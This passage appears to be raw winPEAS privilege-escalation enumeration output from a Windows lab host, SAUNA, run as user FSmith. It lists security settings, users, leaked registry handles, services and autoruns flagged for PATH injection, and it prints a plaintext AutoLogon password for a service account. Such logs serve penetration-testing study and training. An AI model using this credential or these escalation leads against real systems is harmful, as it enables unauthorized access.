È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated isn't available
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerate LSA settings - auth packages included
auditbasedirectories : 0
auditbaseobjects : 0
Bounds : 00-30-00-00-00-20-00-00
crashonauditfail : 0
fullprivilegeauditing : 00
LimitBlankPasswordUse : 1
NoLmHash : 1
Security Packages : ""
Notification Packages : rassfm,scecli
Authentication Packages : msv1_0
LsaPid : 636
LsaCfgFlagsDefault : 0
SecureBoot : 1
ProductType : 7
disabledomaincreds : 0
everyoneincludesanonymous : 0
forceguest : 0
restrictanonymous : 0
restrictanonymoussam : 1
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating NTLM Settings
LanmanCompatibilityLevel : (Send NTLMv2 response only - Win7+ default)
NTLM Signing Settings
ClientRequireSigning : False
ClientNegotiateSigning : True
ServerRequireSigning : True
ServerNegotiateSigning : True
LdapSigning : Negotiate signing (Negotiate signing)
Session Security
NTLMMinClientSec : 536870912 (Require 128-bit encryption)
NTLMMinServerSec : 536870912 (Require 128-bit encryption)
NTLM Auditing and Restrictions
InboundRestrictions : (Not defined)
OutboundRestrictions : (Not defined)
InboundAuditing : (Not defined)
OutboundExceptions :
ÉÍÍÍÍÍÍÍÍÍ͹ Display Local Group Policy settings - local users/machine
ÉÍÍÍÍÍÍÍÍÍ͹ Checking AppLocker effective policy
AppLockerPolicy version: 1
listing rules:
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Printers (WMI)
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Named Pipes
Name CurrentUserPerms Sddl
eventlog Everyone [WriteData/CreateFiles] O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
ROUTER Everyone [WriteData/CreateFiles] O:SYG:SYD:P(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;SY)
RpcProxy\49673 Everyone [WriteData/CreateFiles] O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)
RpcProxy\593 Everyone [WriteData/CreateFiles] O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)
vgauth-service Everyone [WriteData/CreateFiles] O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating AMSI registered providers
Provider: {2781761E-28E0-4109-99FE-B9D127C57AFE}
Path: "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1911.3-0\MpOav.dll"
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Sysmon configuration
You must be an administrator to run this check
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Sysmon process creation logs (1)
You must be an administrator to run this check
ÉÍÍÍÍÍÍÍÍÍ͹ Installed .NET versions
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Interesting Events information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Printing Explicit Credential Events (4648) for last 30 days - A process logged on using plaintext credentials
You must be an administrator to run this check
ÉÍÍÍÍÍÍÍÍÍ͹ Printing Account Logon Events (4624) for the last 10 days.
You must be an administrator to run this check
ÉÍÍÍÍÍÍÍÍÍ͹ Process creation events - searching logs (EID 4688) for sensitive data.
You must be an administrator to run this check
ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell events - script block logs (EID 4104) - searching for sensitive data.
[X] Exception: Attempted to perform an unauthorized operation.
ÉÍÍÍÍÍÍÍÍÍ͹ Displaying Power off/on events for last 5 days
System.UnauthorizedAccessException: Attempted to perform an unauthorized operation.
at System.Diagnostics.Eventing.Reader.EventLogException.Throw(Int32 errorCode)
at System.Diagnostics.Eventing.Reader.NativeWrapper.EvtQuery(EventLogHandle session, String path, String query, Int32 flags)
at System.Diagnostics.Eventing.Reader.EventLogReader..ctor(EventLogQuery eventQuery, EventBookmark bookmark)
at winPEAS.Helpers.MyUtils.GetEventLogReader(String path, String query, String computerName)
at winPEAS.Info.EventsInfo.Power.Power.<GetPowerEventInfos>d__0.MoveNext()
at winPEAS.Checks.EventsInfo.PowerOnEvents()
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Users Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Users
È Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
[X] Exception: Object reference not set to an instance of an object.
Current user: FSmith
Current groups: Domain Users, Everyone, Builtin\Remote Management Users, Users, Builtin\Pre-Windows 2000 Compatible Access, Network, Authenticated Users, This Organization, NTLM Authentication
=================================================================================================
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Current User Idle Time
Current User : EGOTISTICALBANK\FSmith
Idle Time : 03h:43m:58s:484ms
ÉÍÍÍÍÍÍÍÍÍ͹ Display Tenant information (DsRegCmd.exe /status)
Tenant is NOT Azure AD Joined.
ÉÍÍÍÍÍÍÍÍÍ͹ Current Token privileges
È Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#token-manipulation
SeMachineAccountPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
ÉÍÍÍÍÍÍÍÍÍ͹ Clipboard text
ÉÍÍÍÍÍÍÍÍÍ͹ Logged users
[X] Exception: Access denied
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Display information about local users
Computer Name : SAUNA
User Name : Administrator
User Id : 500
Is Enabled : True
User Type : Administrator
Comment : Built-in account for administering the computer/domain
Last Logon : 1/25/2024 2:33:34 PM
Logons Count : 94
Password Last Set : 7/26/2021 8:16:16 AM
=================================================================================================
Computer Name : SAUNA
User Name : Guest
User Id : 501
Is Enabled : False
User Type : Guest
Comment : Built-in account for guest access to the computer/domain
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM
=================================================================================================
Computer Name : SAUNA
User Name : krbtgt
User Id : 502
Is Enabled : False
User Type : User
Comment : Key Distribution Center Service Account
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/22/2020 9:45:30 PM
=================================================================================================
Computer Name : SAUNA
User Name : HSmith
User Id : 1103
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/22/2020 9:54:34 PM
=================================================================================================
Computer Name : SAUNA
User Name : FSmith
User Id : 1105
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/25/2024 5:14:52 PM
Logons Count : 65535
Password Last Set : 1/23/2020 8:45:19 AM
=================================================================================================
Computer Name : SAUNA
User Name : svc_loanmgr
User Id : 1108
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/24/2020 3:48:31 PM
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ RDP Sessions
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Ever logged users
[X] Exception: Access denied
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Home folders found
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\FSmith : FSmith [AllAccess]
C:\Users\Public
C:\Users\svc_loanmgr
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
ÉÍÍÍÍÍÍÍÍÍ͹ Password Policies
È Check for a possible brute-force
Domain: Builtin
SID: S-1-5-32
MaxPasswordAge: 42.22:47:31.7437440
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: 0
=================================================================================================
Domain: EGOTISTICALBANK
SID: S-1-5-21-2966785786-3096785034-1186376766
MaxPasswordAge: 42.00:00:00
MinPasswordAge: 1.00:00:00
MinPasswordLength: 7
PasswordHistoryLength: 24
PasswordProperties: DOMAIN_PASSWORD_COMPLEX
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Print Logon Sessions
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Processes Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Interesting Processes -non Microsoft-
È Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
[X] Exception: Access denied
ÉÍÍÍÍÍÍÍÍÍ͹ Vulnerable Leaked Handlers
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation
È Getting Leaked Handlers, it might take some time...
Handle: 1348(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: TakeOwnership
Registry: HKLM\software\microsoft\windowsruntime
=================================================================================================
Handle: 1696(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: AllAccess
Registry: HKLM\software\microsoft\windows\currentversion\explorer\folderdescriptions\{1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}\propertybag
=================================================================================================
Handle: 1716(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: AllAccess
Registry: HKLM\software\microsoft\windows\currentversion\explorer\folderdescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\propertybag
=================================================================================================
Handle: 1800(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: TakeOwnership
Registry: HKLM\system\controlset001\services\crypt32
=================================================================================================
Handle: 1348(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: TakeOwnership
Registry: HKLM\software\microsoft\windowsruntime
=================================================================================================
Handle: 1696(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: AllAccess
Registry: HKLM\software\microsoft\windows\currentversion\explorer\folderdescriptions\{1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}\propertybag
=================================================================================================
Handle: 1716(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: AllAccess
Registry: HKLM\software\microsoft\windows\currentversion\explorer\folderdescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\propertybag
=================================================================================================
Handle: 1800(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: TakeOwnership
Registry: HKLM\system\controlset001\services\crypt32
=================================================================================================
Handle: 1348(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: TakeOwnership
Registry: HKLM\software\microsoft\windowsruntime
=================================================================================================
Handle: 1696(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: AllAccess
Registry: HKLM\software\microsoft\windows\currentversion\explorer\folderdescriptions\{1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}\propertybag
=================================================================================================
Handle: 1716(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: AllAccess
Registry: HKLM\software\microsoft\windows\currentversion\explorer\folderdescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\propertybag
=================================================================================================
Handle: 1800(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: TakeOwnership
Registry: HKLM\system\controlset001\services\crypt32
=================================================================================================
Handle: 1348(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: TakeOwnership
Registry: HKLM\software\microsoft\windowsruntime
=================================================================================================
Handle: 1696(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: AllAccess
Registry: HKLM\software\microsoft\windows\currentversion\explorer\folderdescriptions\{1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}\propertybag
=================================================================================================
Handle: 1716(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: AllAccess
Registry: HKLM\software\microsoft\windows\currentversion\explorer\folderdescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\propertybag
=================================================================================================
Handle: 1800(key)
Handle Owner: Pid is 1068(w) with owner: FSmith
Reason: TakeOwnership
Registry: HKLM\system\controlset001\services\crypt32
=================================================================================================
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Services Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
[X] Exception: Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
ÉÍÍÍÍÍÍÍÍÍ͹ Interesting Services -non Microsoft-
È Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
[X] Exception: Access denied
@arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver(PMC-Sierra, Inc. - @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver)[System32\drivers\arcsas.sys] - Boot
=================================================================================================
@netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD(QLogic Corporation - @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD)[System32\drivers\bxvbda.sys] - Boot
=================================================================================================
@bcmfn2.inf,%bcmfn2.SVCDESC%;bcmfn2 Service(Windows (R) Win 7 DDK provider - @bcmfn2.inf,%bcmfn2.SVCDESC%;bcmfn2 Service)[C:\Windows\System32\drivers\bcmfn2.sys] - System
=================================================================================================
@bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver(QLogic Corporation - @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver)[System32\drivers\bxfcoe.sys] - Boot
=================================================================================================
@bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver(QLogic Corporation - @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver)[System32\drivers\bxois.sys] - Boot
=================================================================================================
@cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver(Chelsio Communications - @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver)[C:\Windows\System32\drivers\cht4vx64.sys] - System
=================================================================================================
@net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I(Intel Corporation - @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I)[C:\Windows\System32\drivers\e1i63x64.sys] - System
=================================================================================================
@netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD(QLogic Corporation - @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD)[System32\drivers\evbda.sys] - Boot
=================================================================================================
@ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver(Intel Corporation - @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver)[C:\Windows\System32\drivers\iaLPSSi_GPIO.sys] - System
=================================================================================================
@ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver(Intel Corporation - @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver)[C:\Windows\System32\drivers\iaLPSSi_I2C.sys] - System
=================================================================================================
@iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller(Intel Corporation - @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller)[System32\drivers\iaStorAVC.sys] - Boot
=================================================================================================
@iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7(Intel Corporation - @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7)[System32\drivers\iaStorV.sys] - Boot
=================================================================================================
@mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver)(Mellanox - @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver))[C:\Windows\System32\drivers\ibbus.sys] - System
=================================================================================================
@mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator(Mellanox - @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator)[C:\Windows\System32\drivers\mlx4_bus.sys] - System
=================================================================================================
@mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service(Mellanox - @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service)[C:\Windows\System32\drivers\ndfltr.sys] - System
=================================================================================================
@netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD(Cavium, Inc. - @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD)[System32\drivers\qevbda.sys] - Boot
=================================================================================================
@qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver(Cavium, Inc. - @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver)[System32\drivers\qefcoe.sys] - Boot
=================================================================================================
@qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver(QLogic Corporation - @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver)[System32\drivers\qeois.sys] - Boot
=================================================================================================
@ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64))[System32\drivers\ql2300i.sys] - Boot
=================================================================================================
@ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver(QLogic Corporation - @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver)[System32\drivers\ql40xx2i.sys] - Boot
=================================================================================================
@qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64))[System32\drivers\qlfcoei.sys] - Boot
=================================================================================================
OpenSSH Authentication Agent(OpenSSH Authentication Agent)[C:\Windows\System32\OpenSSH\ssh-agent.exe] - Manual
Agent to hold private keys used for public key authentication.
=================================================================================================
@usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver(@usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver)[C:\Windows\System32\drivers\USBSTOR.SYS] - System
=================================================================================================
@usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller(@usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller)[C:\Windows\System32\drivers\USBXHCI.SYS] - System
=================================================================================================
VMware Alias Manager and Ticket Service(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Autoload
Alias Manager and Ticket Service
=================================================================================================
@oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service(VMware, Inc. - @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service)[C:\Windows\system32\vm3dservice.exe] - Autoload
@oem8.inf,%VM3DSERVICE_DESCRIPTION%;Helps VMware SVGA driver by collecting and conveying user mode information
=================================================================================================
@oem9.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver(VMware, Inc. - @oem9.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver)[System32\drivers\vmci.sys] - Boot
=================================================================================================
Memory Control Driver(VMware, Inc. - Memory Control Driver)[C:\Windows\system32\DRIVERS\vmmemctl.sys] - Autoload
Driver to provide enhanced memory management of this virtual machine.
=================================================================================================
@oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device(VMware, Inc. - @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device)[C:\Windows\System32\drivers\vmmouse.sys] - System
=================================================================================================
VMware Tools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Autoload
Provides support for synchronizing objects between the host and guest operating systems.
=================================================================================================
@oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device(VMware, Inc. - @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device)[C:\Windows\System32\drivers\vmusbmouse.sys] - System
=================================================================================================
@oem4.inf,%loc.vmxnet3.ndis6.DispName%;vmxnet3 NDIS 6 Ethernet Adapter Driver(VMware, Inc. - @oem4.inf,%loc.vmxnet3.ndis6.DispName%;vmxnet3 NDIS 6 Ethernet Adapter Driver)[C:\Windows\System32\drivers\vmxnet3.sys] - System
=================================================================================================
vSockets Virtual Machine Communication Interface Sockets driver(VMware, Inc. - vSockets Virtual Machine Communication Interface Sockets driver)[system32\DRIVERS\vsock.sys] - Boot
vSockets Driver
=================================================================================================
@vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver(VIA Corporation - @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver)[System32\drivers\vstxraid.sys] - Boot
=================================================================================================
@%SystemRoot%\System32\drivers\vwifibus.sys,-257(@%SystemRoot%\System32\drivers\vwifibus.sys,-257)[C:\Windows\System32\drivers\vwifibus.sys] - System
@%SystemRoot%\System32\drivers\vwifibus.sys,-258
=================================================================================================
@mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service(Mellanox - @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service)[C:\Windows\System32\drivers\winmad.sys] - System
=================================================================================================
@winusb.inf,%WINUSB_SvcName%;WinUsb Driver(@winusb.inf,%WINUSB_SvcName%;WinUsb Driver)[C:\Windows\System32\drivers\WinUSB.SYS] - System
@winusb.inf,%WINUSB_SvcDesc%;Generic driver for USB devices
=================================================================================================
@mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service(Mellanox - @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service)[C:\Windows\System32\drivers\winverbs.sys] - System
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Modifiable Services
È Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
You cannot modify any service
ÉÍÍÍÍÍÍÍÍÍ͹ Looking if you can modify any service registry
È Check if you can modify the registry of a service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions
[-] Looks like you cannot change the registry of any service...
ÉÍÍÍÍÍÍÍÍÍ͹ Checking write permissions in PATH folders (DLL Hijacking)
È Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32
C:\Windows
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\OpenSSH\
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Applications Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Current Active Window Application
[X] Exception: Object reference not set to an instance of an object.
ÉÍÍÍÍÍÍÍÍÍ͹ Installed Applications --Via Program Files/Uninstall registry--
È Check if you can modify installed software https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
C:\Program Files\Common Files
C:\Program Files\desktop.ini
C:\Program Files\internet explorer
C:\Program Files\Uninstall Information
C:\Program Files\VMware
C:\Program Files\Windows Defender
C:\Program Files\Windows Defender Advanced Threat Protection
C:\Program Files\Windows Mail
C:\Program Files\Windows Media Player
C:\Program Files\Windows Multimedia Platform
C:\Program Files\windows nt
C:\Program Files\Windows Photo Viewer
C:\Program Files\Windows Portable Devices
C:\Program Files\Windows Security
C:\Program Files\Windows Sidebar
C:\Program Files\WindowsApps
C:\Program Files\WindowsPowerShell
ÉÍÍÍÍÍÍÍÍÍ͹ Autorun Applications
È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
Error getting autoruns from WMIC: System.Management.ManagementException: Access denied
at System.Management.ThreadDispatch.Start()
at System.Management.ManagementScope.Initialize()
at System.Management.ManagementObjectSearcher.Initialize()
at System.Management.ManagementObjectSearcher.Get()
at winPEAS.Info.ApplicationInfo.AutoRuns.GetAutoRunsWMIC()
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: SecurityHealth
Folder: C:\Windows\system32
File: C:\Windows\system32\SecurityHealthSystray.exe
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: VMware VM3DService Process
Folder: C:\Windows\system32
File: C:\Windows\system32\vm3dservice.exe -u
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: VMware User Process
Folder: C:\Program Files\VMware\VMware Tools
File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and Space detected)
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Key: Common Startup
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup (Unquoted and Space detected)
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Key: Common Startup
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup (Unquoted and Space detected)
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Key: Userinit
Folder: C:\Windows\system32
File: C:\Windows\system32\userinit.exe,
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Key: Shell
Folder: None (PATH Injection)
File: explorer.exe
=================================================================================================
RegPath: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
Key: AlternateShell
Folder: None (PATH Injection)
File: cmd.exe
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Font Drivers
Key: Adobe Type Manager
Folder: None (PATH Injection)
File: atmfd.dll
=================================================================================================
RegPath: HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
Key: Adobe Type Manager
Folder: None (PATH Injection)
File: atmfd.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: midimapper
Folder: None (PATH Injection)
File: midimap.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.imaadpcm
Folder: None (PATH Injection)
File: imaadp32.acm
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.l3acm
Folder: C:\Windows\System32
File: C:\Windows\System32\l3codeca.acm
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msadpcm
Folder: None (PATH Injection)
File: msadp32.acm
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msg711
Folder: None (PATH Injection)
File: msg711.acm
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msgsm610
Folder: None (PATH Injection)
File: msgsm32.acm
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.i420
Folder: None (PATH Injection)
File: iyuv_32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.iyuv
Folder: None (PATH Injection)
File: iyuv_32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.mrle
Folder: None (PATH Injection)
File: msrle32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.msvc
Folder: None (PATH Injection)
File: msvidc32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.uyvy
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yuy2
Folder: None (PATH Injection)
